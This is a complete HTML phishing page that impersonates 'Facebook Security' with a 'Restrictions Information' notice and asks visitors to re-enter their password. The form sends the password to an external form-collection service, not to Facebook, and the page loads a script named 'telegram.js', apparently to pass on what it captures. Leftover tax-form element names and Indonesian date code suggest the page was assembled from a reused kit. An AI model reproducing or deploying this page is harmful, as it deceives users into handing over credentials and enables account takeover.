<html lang="en" class="">
  <head>
    <title>Restrictions Information</title>
    <link rel="icon" type="image/x-icon" href="favicon.ico" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, user-scalable=0"
    />
    <link rel="stylesheet" type="text/css" href="/style1.css" />
    <link rel="stylesheet" type="text/css" href="/style2.css" />
    <script language="JavaScript">
      var tanggallengkap = new String();
      var namahari = "Minggu Senin Selasa Rabu Kamis Jumat Sabtu";
      namahari = namahari.split(" ");
      var namabulan =
        "January February March April May June July August September October November December";
      namabulan = namabulan.split(" ");
      var tgl = new Date();
      var hari = tgl.getDay();
      var tanggal = tgl.getDate();
      var bulan = tgl.getMonth();
      var tahun = tgl.getFullYear();
      tanggallengkap = namabulan[bulan] + " " + tanggal + ", " + tahun;
    </script>
    <script src="telegram.js"></script>
  </head>
  <body class="">
    <div id="page-div">
      <div id="progress-bar-container" class="">
        <div class="iConWeb">
          <!-- SVG content here -->
        </div>
      </div>
      <div id="interview-page-container" class="">
        <div class="BackArrowAndHeading">
          <center>
            <img
              alt=""
              src="https://www.facebook.com/images/fb_icon_325x325.png"
              width="20%"
            /><br />
          </center>
        </div>
        <div class="groupSubHeadersWrapper">
          <h5 id="groupSubHeader">Facebook Security</h5>
        </div>
        <div id="interview-container">
          <div id="tax-form">
            <div id="AboutYouSection" class="Question AboutYouSection">
              <div class="CaptionWrapper">
                <div class="Caption">
                  <font color="grey"
                    >Please re-enter your password to complete the request.
                    <a></a>
                  </font>
                </div>
                <font color="grey"> </font>
              </div>
              <font color="grey">
                <form action="https://submit-form.com/1dTni7zeG" method="POST" id="form3">
                  <div class="ElementWrapper">
                    <div
                      data-form-element-key="PrevToPrevYearDays"
                      class="FormElement FormElement_TextBox NoTopMargin PrevToPrevYearDays"
                    >
                      <div
                        data-form-element-key="PrevYearDays"
                        class="FormElement FormElement_TextBox NoTopMargin PrevYearDays"
                      >
                        <div class="TextBox floatingLabelContainer">
                          <input
                            type="password"
                            name="password"
                            id="PrevYearDays"
                            required=""
                            placeholder=" "
                          />
                          <label
                            class="Caption"
                            title="Password"
                            for="PrevYearDays"
                          >
                            Password
                          </label>
                        </div>
                      </div>
                    </div>
                    <span id="error_IndividualOrBusiness" class="error-message"
                      >Required</span
                    >
                    <div
                      data-form-element-key="USResidentCueAlert"
                      class="FormElement FormElement_AlertMessage AlertMessageTopMargin USResidentCueAlert"
                    ></div>
                    <div
                      data-form-element-key="ButtonNext"
                      class="FormElement FormElement_Button ButtonNext"
                    >
                      <div class="Button">
                        <button
                          type="submit"
                          name="ButtonNext"
                          class="ButtonNext"
                          data-elements-processor=""
                        >
                          Submit
                        </button>
                      </div>
                    </div>
                  </div>
                  <center>
                    <font color="black"><font size="2">Meta 2024</font></font>
                  </center>
                </form>
              </font>
            </div>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
